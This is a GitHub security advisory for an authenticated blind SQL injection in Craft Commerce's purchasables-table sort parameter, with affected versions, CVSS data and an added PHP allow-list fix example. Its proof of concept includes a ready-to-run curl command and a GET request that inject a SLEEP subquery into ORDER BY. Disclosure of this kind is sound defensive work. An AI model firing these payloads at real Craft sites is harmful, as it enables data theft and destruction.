GHSA-J3X5-MGHF-XVFW

Vulnerability from github – Published: 2026-03-10 18:23 – Updated: 2026-03-10 22:55
Summary
Craft Commerce is Vulnerable to SQL Injection in Commerce Purchasables Table Sorting
Details

Summary

Craft Commerce is vulnerable to SQL Injection in the purchasables table endpoint. The sort parameter is split by | and the first part (column name) is passed directly as an array key to orderBy() without whitelist validation. Yii2's query builder does NOT escape array keys, allowing an authenticated attacker to inject arbitrary SQL into the ORDER BY clause.
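The whitelist validation the advisory says is missing, as an added illustration (not Craft Commerce's code or its actual fix): the `column|direction` sort string is resolved against a fixed allow list before anything reaches Yii2's orderBy(), so the column name is never built from request input. The column list and the SortParam class are assumptions for the example.

```php
<?php
// Added example, not Craft Commerce's code: an allow-list parser for a
// "column|direction" sort parameter, illustrating the whitelist check the
// advisory says the vulnerable endpoint lacked.
// Assumed: the caller is a Yii2 controller that passes the result to
// yii\db\Query::orderBy(). The column names below are hypothetical.

declare(strict_types=1);

final class SortParam
{
    /** Only these columns may ever reach ORDER BY (hypothetical list). */
    private const ALLOWED_COLUMNS = ['id', 'title', 'sku', 'price'];

    /**
     * Parse "column|direction" into the array form orderBy() accepts,
     * e.g. ['title' => SORT_DESC]. Anything outside the allow list is
     * rejected instead of being passed through as an array key.
     *
     * @throws \InvalidArgumentException on an unknown column or direction
     */
    public static function parse(string $sort): array
    {
        // Split once only; any extra "|" stays inside the (invalid) column name.
        [$column, $direction] = array_pad(explode('|', $sort, 2), 2, 'asc');

        // Strict comparison against the allow list: a value such as the
        // advisory's "id,(SELECT SLEEP(2))" can never match. This check, not
        // quoting, is what closes the hole, because Yii2 does not quote array
        // keys that contain parentheses.
        if (!in_array($column, self::ALLOWED_COLUMNS, true)) {
            throw new \InvalidArgumentException("Unknown sort column: {$column}");
        }

        $direction = strtolower($direction);
        if ($direction !== 'asc' && $direction !== 'desc') {
            throw new \InvalidArgumentException("Unknown sort direction: {$direction}");
        }

        return [$column => $direction === 'desc' ? SORT_DESC : SORT_ASC];
    }
}

// Usage with hypothetical request values; the unsafe pattern this replaces is
// $query->orderBy([$requestColumn => SORT_ASC]) taken straight from the request.
var_dump(SortParam::parse('title|desc'));
try {
    SortParam::parse('id,(SELECT SLEEP(2))|asc');   // the advisory's payload shape
} catch (\InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;                  // rejected before orderBy()
}
```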


PoC

Required Permissions

  • General
    • Access the control panel
    • Access Craft Commerce
  • Craft Commerce
    • Manage orders
    • Edit orders

Steps to reproduce

  1. Log in to the control panel
  2. Navigate to Commerce > Orders > Create a new order
  3. Click on "Add a line item" to show the purchasables table
  4. Intercept the AJAX request and modify the sort parameter as follows:
     GET /index.php?p=admin/actions/commerce/orders/purchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(2))|asc
  5. Observe the delay in the response, confirming the injection

Alternatively, you can use the following curl (bash syntax) command (replace cookie and target domain as needed):

curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin%2Factions%2Fcommerce%2Forders%2Fpurchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(5))|asc'

Impact

With this Blind SQLi, an attacker can:

  • Exfiltrate data character-by-character (same technique as GHSA-pmgj-gmm4-jh6j).
  • Modify or destroy data (drop tables, update records, alter schema).


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.10.1"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/commerce"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.5.2"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/commerce"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29172"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-10T18:23:07Z",
    "nvd_published_at": "2026-03-10T20:16:38Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nCraft Commerce is vulnerable to **SQL Injection** in the purchasables table endpoint. The `sort` parameter is split by `|` and the first part (column name) is passed directly as an array key to `orderBy()` without whitelist validation. Yii2\u0027s query builder does **NOT** escape array keys, allowing an authenticated attacker to inject arbitrary SQL into the `ORDER BY` clause.\n\n---\n## PoC\n### Required Permissions\n- General\n\t- Access the control panel\n\t- Access Craft Commerce\n- Craft Commerce\n\t- Manage orders\n\t- Edit orders\n\n### Steps to reproduce\n1. Log in to the control panel\n2. Navigate to **Commerce** \u003e **Orders** \u003e Create a new order\n3. Click on \"Add a line item\" to show the purchasables table\n4. Intercept the AJAX request and modify the `sort` parameter as follows:\n```http\nGET /index.php?p=admin/actions/commerce/orders/purchasables-table\u0026siteId=1\u0026sort=id,(SELECT%20SLEEP(2))|asc\n```\n5. Observe the delay in the response, confirming the injection\n\nAlternatively, you can use the following `curl` (bash syntax) command (replace cookie and target domain as needed):\n```bash\ncurl --path-as-is -k -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0\u0027 -H $\u0027Accept: application/json, text/plain, */*\u0027 -b $\u0027\u003cCookie\u003e\u0027 $\u0027http://craft.local/index.php?p=admin%2Factions%2Fcommerce%2Forders%2Fpurchasables-table\u0026siteId=1\u0026sort=id,(SELECT%20SLEEP(5))|asc\u0027\n```\n\n### Impact\nWith this Blind SQLi, an attacker can:\n- **Exfiltrate data** character-by-character (same technique as [GHSA-pmgj-gmm4-jh6j](https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j)).\n- **Modify or destroy data** (drop tables, update records, alter schema).",
  "id": "GHSA-j3x5-mghf-xvfw",
  "modified": "2026-03-10T22:55:11Z",
  "published": "2026-03-10T18:23:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-j3x5-mghf-xvfw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29172"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/commit/b231b920b73db023e81e5b261b894d73e865c276"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/commerce/commit/e4e0f4107cd895d29290523637f077fe280407b1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/commerce"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft Commerce is Vulnerable to SQL Injection in Commerce Purchasables Table Sorting"
}

